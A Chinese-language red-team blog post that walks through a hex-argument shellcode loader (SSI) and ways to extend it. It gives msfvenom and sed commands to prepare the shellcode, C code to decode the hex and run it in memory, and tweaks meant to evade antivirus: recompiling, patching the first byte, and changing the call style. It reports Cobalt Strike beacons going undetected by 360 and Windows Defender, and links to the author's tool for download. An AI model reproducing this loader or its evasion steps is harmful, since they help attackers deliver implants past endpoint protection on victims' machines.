在github有一个ssi的项目,项目地址如下:https://github.com/DimopoulosElias/SimpleShellcodeInjector/ 他可以实现shellcode的远程加载(十六进制),当然LDrakura也曾经搞过类似的项目(我偷电瓶车养你啊),当时还是一次项目时绕卡巴斯基的时候他丢我的。本文将简单介绍该项目的原理,并给出其他实现方法。
shellcode处理
首先需要处理shellcode,这里推荐使用kali直接处理,推荐下面的两种方法。
cat 1.txt | grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"
或者
msfvenom -p windows/exec CMD=calc.exe -f raw | xxd -ps
cs的shellcode推荐第二种,如果是第一种,需要做一些调整操作,像下面这样:
加载原理
加载器通过参数的方式传递hex的shellcode到加载器内,然后使用一些操作还原shellcode,这里有一些需要注意的点,比如数组的长度为1066,那么他就是由shellcode[0]=f到shellcode[1665]=7构成后面加上一个终止符,此时strlen(shellcode)=1666,sizeof(shellcode)=1667,所以在计算长度时便需要这样 x=(sizeof(shellcode) - 1) . or x= strlen(shellcode),因为每两个字节为一组,所以我们在分配内存时,需要进行除二操作,比如bytes = (sizeof(shellcode) - 1)/2 或者 bytes = strlen(shellcode)/2。
接下来便是还原shellcode的操作了
for(unsigned int i = 0; i< iterations-1; i++) {
sscanf(shellcode+2*i, "%2X", &char_in_hex);
shellcode[i] = (char)char_in_hex;
}
或者使用下面这样的方法:
void AsciiToHex(char * pAscii, unsigned char * pHex, int nLen)
{ if (nLen % 2)
return;
int nHexLen = nLen / 2;
for (int i = 0; i < nHexLen; i++)
{
unsigned char Nibble[2];
Nibble[0] = *pAscii++;
Nibble[1] = *pAscii++;
for (int j = 0; j < 2; j++)
{
if (Nibble[j] <= 'F' && Nibble[j] >= 'A')
Nibble[j] = Nibble[j] - 'A' + 10;
else if (Nibble[j] <= 'f' && Nibble[j] >= 'a')
Nibble[j] = Nibble[j] - 'a' + 10;
else if (Nibble[j] >= '0' && Nibble[j] <= '9')
Nibble[j] = Nibble[j] - '0';
else
return;
} // for (int j = ...)
pHex[i] = Nibble[0] << 4; // Set the high nibble
pHex[i] |= Nibble[1]; //Set the low nibble
} // for (int i = ...)
}
然后剩下的便是分配内存、装入shellcode,作者使用的是
(*(void (*)()) exec)();
来进行最后的加载。
测试
明白原理之后,重新编译(原文件md5可能已被标记),使用360全家桶进行扫描:
联网情况下是没有任何问题的,然后上线我们的cs试试:
可直接上线,注:x64的shellcode上线有问题,程序会崩溃。
修改
更改shellcode前几个字节,然后加载到内存更改回来,然后解密hex加载,并更改shellcode加载方式。
更改加载的方法之前也是发过的。
反转方式如下:
char first[] = "\xfc";
memcpy(shellcode,fisrt,1);
加载方式如下:
typedef void (*some_func)();
some_func func = (some_func)exec;
func();
ps:只是更改了一个写法。
测试弹出计算器:
windows defender上线测试:
总结:
cs生成的shellcode过长,可想直接写入程序,程序下载地址:
https://github.com/lengjibo/RedTeamTools/tree/master/windows/SSI
欢迎star